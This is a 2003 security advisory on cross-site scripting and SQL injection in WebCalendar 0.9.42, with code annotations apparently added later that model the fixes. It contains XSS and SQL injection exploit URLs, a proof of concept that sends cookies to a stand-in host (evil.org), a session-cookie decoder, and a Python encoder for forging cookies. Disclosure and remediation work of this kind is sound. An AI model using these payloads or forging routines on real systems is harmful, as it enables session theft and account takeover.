Message-ID: <20030903164648.GA70074@ak.texas-shooters.com>
From: nocon at texas-shooters.com (noconflic)
Subject: Webcalendar <= 0.9.42 Cross Site Scripting Attacks and Potential SQL Injection Attack



-------------- next part --------------
Webcalendar <= 0.9.42
http://webcalendar.sourceforge.net/

  WebCalendar is a PHP application used to maintain a calendar for one or more persons


Cross Site Scripting
========================================

Files (maybe others):
----------------------------
includes/js/colors.php

Code snippet:
[...]
   window.opener.document.prefform.<?php echo $color?>.value= color;
[...]


Exploit: 
---------------------------
http://www.host.name/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>


Files (maybe others):
-------------------------
week.php

Code snippet:
[...]
  echo html_for_add_icon (  date ( "Ymd", $days[$d] ), $time_h, $time_m, $user );
[...]

Exploit:
--------------------
http://www.host.name/webcalendar/week.php?user="><script>alert(document.cookie)</script>


Files (maybe others):
-------------------------
day.php month.php week_details.php view_l.php view_m.php view_t.php view_v.php view_w.php

Code snippet:
[...]
  echo $eventinfo;
[...]

Exploit:
----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>


POC:
-----------------
http://www.host.name/webcalendar/week.php?eventinfo=<script src=http://www.evil.org/evilcode.js></script>

"evilcode.js"
<--------------->
window.open('http://www.evil.org/cgi-bin/logcookie.cgi?'+document.cookie);
<--------------->
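The three injection points above sit in three different output contexts, and the fix differs for each. The following Python model is an added example and not WebCalendar code: each point is rendered the way the quoted 0.9.42 snippet does it, then with a context-appropriate fix, and the page's own payloads are run through both. The markup around the week.php link (edit_entry.php, the img tag) is assumed from the payload's leading `">`, the field name "pref_color" is an example value, and in PHP the equivalents are htmlspecialchars($x, ENT_QUOTES) for the two HTML contexts and a whitelist test for the JavaScript-identifier context.

```python
"""Python model (added example, not WebCalendar code) of the three XSS points
quoted from WebCalendar 0.9.42: colors.php (JavaScript identifier context),
week.php (HTML attribute context) and the echo $eventinfo sinks (HTML body)."""
import html
import re

# Payloads taken from the exploit URLs above, URL-decoded.
COLORS_PAYLOAD = "</script><script>alert(document.cookie)</script>"
WEEK_USER_PAYLOAD = '"><script>alert(document.cookie)</script>'
EVENTINFO_PAYLOAD = "<script>alert(document.cookie)</script>"

_JS_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def is_safe_js_identifier(name: str) -> bool:
    """$color is used as a property name inside a <script> block.  No output
    encoding makes an arbitrary string safe there; the input must be validated."""
    return bool(_JS_IDENT.match(name))


def colors_js_vulnerable(color: str) -> str:
    # includes/js/colors.php as quoted: raw interpolation into JavaScript.
    return f"window.opener.document.prefform.{color}.value = color;"


def colors_js_fixed(color: str) -> str:
    # Whitelist, not escaping: reject anything that is not a form field name.
    if not is_safe_js_identifier(color):
        raise ValueError("color is not a form field name")
    return f"window.opener.document.prefform.{color}.value = color;"


def add_icon_vulnerable(user: str) -> str:
    # week.php: $user lands inside a double-quoted attribute (markup assumed).
    return f'<a href="edit_entry.php?user={user}"><img src="new.gif"></a>'


def add_icon_fixed(user: str) -> str:
    # quote=True also escapes both quote characters, so the attribute cannot
    # be closed early by the payload's leading '">'.
    return f'<a href="edit_entry.php?user={html.escape(user, quote=True)}"><img src="new.gif"></a>'


def eventinfo_vulnerable(eventinfo: str) -> str:
    # day.php and friends: echo $eventinfo; straight into the page body.
    return f"<div>{eventinfo}</div>"


def eventinfo_fixed(eventinfo: str) -> str:
    return f"<div>{html.escape(eventinfo, quote=True)}</div>"


def contains_script_tag(markup: str) -> bool:
    """Does a literal <script ...> or </script> tag survive into the output?"""
    return re.search(r"</?script\b", markup, re.IGNORECASE) is not None


if __name__ == "__main__":
    cases = (
        ("colors.php", colors_js_vulnerable, colors_js_fixed, COLORS_PAYLOAD),
        ("week.php", add_icon_vulnerable, add_icon_fixed, WEEK_USER_PAYLOAD),
        ("day.php", eventinfo_vulnerable, eventinfo_fixed, EVENTINFO_PAYLOAD),
    )
    for label, vuln, fixed, payload in cases:
        print(label, "vulnerable:", vuln(payload))
        try:
            print(label, "fixed:     ", fixed(payload))
        except ValueError as exc:
            print(label, "fixed:      rejected input:", exc)
```

The point of the first case is that htmlspecialchars() is the wrong tool when user input is placed inside a script block as code: encoding `<` to `&lt;` there merely produces a JavaScript syntax error instead of a working page, while a whitelist on the identifier keeps the page working and the payload out.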

  We can then use the code provided in includes/functions.php and includes/validate.php
to decode the "webcalendar_session" value taken from the cookie. Although the application
calls it a hash, it is a reversible encoding of the login name and the crypt(3) password
hash, as the attached PHP decoder below shows.

From functions.php:
<----------------->
// Extract a user's name from a session id
// This is a lame attempt at security.  Otherwise, users would be
// able to edit their cookies.txt file and set the username in plain
// text.
<----------------->

Source: http://nocon.darkflame.net/CSS/decode.txt 
Demo:   http://nocon.darkflame.net/CSS/decode.php

   Example: 
       
     webcalendar_session=838ea889b26c9772819d709b826e7b8f926d;

     Hash: 838ea889b26c9772819d709b826e7b8f926d
     Decoded: 
        Login: demo
        Passw: Mn7ggQrGTEpi2 

  "Mn7ggQrGTEpi2" is a traditional 13-character crypt(3) DES hash, so a standard Unix
  password cracker (John the Ripper, for example) can be run against it to recover the
  plaintext password.
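The cookie scheme described above, reimplemented in Python as an added example (it is not WebCalendar's or the advisory's code): the offset table and the "login|crypted_password" layout are taken from the decode.php attached at the end of this message, the decoder is checked against the advisory's own example cookie, and the encoder is the byte-wise inverse of that decoder, which is assumed rather than copied from WebCalendar. The round trip is what makes the functions.php comment above an understatement: anyone holding a user's crypt(3) hash can forge that user's cookie without touching the password.

```python
"""Reimplementation (added example, not WebCalendar code) of the
webcalendar_session cookie encoding that the attached decode.php reverses."""

# Per-byte additive keys, cycled every five bytes; values from decode.php.
OFFSETS = (31, 41, 59, 26, 54)


def decode_session(cookie_hex: str) -> tuple:
    """Turn the hex cookie value back into (login, crypt3_hash).

    Each pair of hex digits is one byte; subtracting the position's offset
    modulo 256 yields the plaintext "login|crypted_password"."""
    raw = bytes.fromhex(cookie_hex)
    plain = bytes((b - OFFSETS[i % len(OFFSETS)]) % 256 for i, b in enumerate(raw))
    login, _, cryptpw = plain.decode("latin-1").partition("|")
    return login, cryptpw


def encode_session(login: str, cryptpw: str) -> str:
    """Assumed inverse of decode_session: add the same offsets and hex-encode.
    This is all an attacker needs to forge a cookie for any user whose
    crypt(3) hash is known (for instance one recovered from another cookie)."""
    plain = f"{login}|{cryptpw}".encode("latin-1")
    return bytes((b + OFFSETS[i % len(OFFSETS)]) % 256 for i, b in enumerate(plain)).hex()


def is_unix_des_crypt(h: str) -> bool:
    """True if h has the shape of a traditional crypt(3) DES hash: 13 characters
    (2-character salt plus 11-character hash) drawn from [A-Za-z0-9./], i.e.
    exactly what a standard Unix password cracker expects as input."""
    alphabet = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./")
    return len(h) == 13 and all(c in alphabet for c in h)


if __name__ == "__main__":
    # The cookie value from the advisory's own example.
    cookie = "838ea889b26c9772819d709b826e7b8f926d"
    login, cryptpw = decode_session(cookie)
    print(f"login={login} crypt={cryptpw} des_crypt={is_unix_des_crypt(cryptpw)}")
    # Forging: re-encoding what we decoded reproduces the original cookie,
    # and any (login, hash) pair encodes to a cookie the server will accept
    # as long as the hash matches that user's stored one.
    assert encode_session(login, cryptpw) == cookie
    print("forged cookie for the same user:", encode_session(login, cryptpw))
```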


Potential SQL Injection:
============================

  This seems to affect view_t.php, view_w.php, view_v.php and maybe
  others.

http://www.host.name/webcalendar/view_m.php?id=additional%20sql%20command

   If "magic quotes" (magic_quotes_gpc) is set to off, then login.php is also
   vulnerable. Note that the id example above contains no quote character, so
   magic quotes, which only escapes quotes, backslashes and NUL bytes, offers no
   protection there; it only matters for the quoted login.php parameters below.

http://www.host.name/webcalendar/login.php?user='additional%20sql%20command
http://www.host.name/webcalendar/login.php?password='additional%20sql%20command


----------------------------------------------------------------------------------------

Author Contacted on: Tue, 29 Jul 2003
Response: 

From: Craig Knudsen <cknudsen@...udsen.com>
Subject: Re: Webcalendar Vulnerabilities

The source of most of these security issues is the use of global
variables, which seemed to be the way to go back in PHP3.  I've tried to
maintain compatibility to PHP3, but I'm thinking it's not worth the
security risks at this point.  I will likely drop the use of global
variables in one of the next couple of releases.

In the meantime, I'll take a look at the issues you've listed here.  
 
Thanks.
Craig

Requested Update on: Tue, 2 Sep 2003
Response: NONE

----------------------------------------------------------------------------------------


Advisory: 
http://nocon.darkflame.net/CSS/Wecalendar.txt

Additional Resources:

- WWW Security White Paper
  http://www.discover.co.uk/www-secuirity.html
        
- Perl: http://www.developer.com/lang/article.php/861781
- PHP:  http://www.phpadvisory.com/articles/view.phtml?ID=5
- SQL Injection:
  http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
        
- HTML Code Injection and Cross-site scripting
  http://www.technicalinfo.net/papers/CSS.html
           
- Google is your friend ;)
  http://www.google.com


- nocon
Date: Wed Sep 3 2003
http://nocon.darkflame.net/

-------------- next part --------------
<html>
<head>
    <title> Webcalendar Cookie Decode </title>
</head>
<body>

<form method="post" action="<?php echo htmlspecialchars ( $_SERVER['PHP_SELF'], ENT_QUOTES ); ?>">
<table width="200" border="0" cellspacing="1" cellpadding="0" bgcolor="#000000">
<tr><td>
   <table width="100%" border="0" cellspacing="2" cellpadding="2" bgcolor="#FFFFFF">
      <tr align="center">
        <td colspan="2">Webcalendar Cookie Decode <br> <a href="http://nocon.darkflame.net/">
        http://nocon.darkflame.net/</a> <br><br>
       </td>
      </tr>
     <tr>
    <td><strong>Hash</strong></td>  
    <td align="right"><input type="text" name="hash" size="60"></td>
   </tr>
<tr>
    <td>&nbsp;</td>
    <td align="center"> <input type="submit" value="Decode"></td>
</tr>
</table>
    </td>
</tr>
</table>
</form>

<?php
// Decoder for the "webcalendar_session" cookie value: a hex string hiding
// "login|crypt(3) password hash" behind a per-byte additive offset.  The
// decode_string() routine follows the one in WebCalendar's includes/functions.php.
// $_POST, $_SERVER and explode() replace the original $HTTP_POST_VARS, $PHP_SELF
// and split(), which no longer exist in current PHP releases.

$encoded_login = isset ( $_POST['hash'] ) ? trim ( $_POST['hash'] ) : '';

// Offsets WebCalendar adds to successive bytes, cycling every five bytes.
$offsets = array ( 31, 41, 59, 26, 54 );

function decode_string ( $instr ) {
  global $offsets;
  $orig = "";
  for ( $i = 0; $i < strlen ( $instr ); $i += 2 ) {
    // two hex digits per encoded byte
    $val = hexdec ( substr ( $instr, $i, 2 ) );
    // undo the offset for this byte position, wrapping at 256
    $j = ( $i / 2 ) % count ( $offsets );
    $newval = ( $val - $offsets[$j] + 256 ) % 256;
    $orig .= chr ( $newval );
  }
  return $orig;
}

if ( $encoded_login !== '' ) {
  if ( ! ctype_xdigit ( $encoded_login ) || strlen ( $encoded_login ) % 2 != 0 ) {
    echo "<b>Input must be a hex string of even length.</b><br>";
  } else {
    // decoded payload layout is "login|crypted password"
    $login_pw = explode ( '|', decode_string ( $encoded_login ), 2 );
    $login = $login_pw[0];
    $cryptpw = isset ( $login_pw[1] ) ? $login_pw[1] : '';

    // escape before echoing so the decoder does not reproduce the bug it demonstrates
    echo "<b> Login:</b> " . htmlspecialchars ( $login, ENT_QUOTES ) . " <br>";
    echo "<b> Passw:</b> " . htmlspecialchars ( $cryptpw, ENT_QUOTES ) . " <br>";
  }
}

?>
</body>
</html>
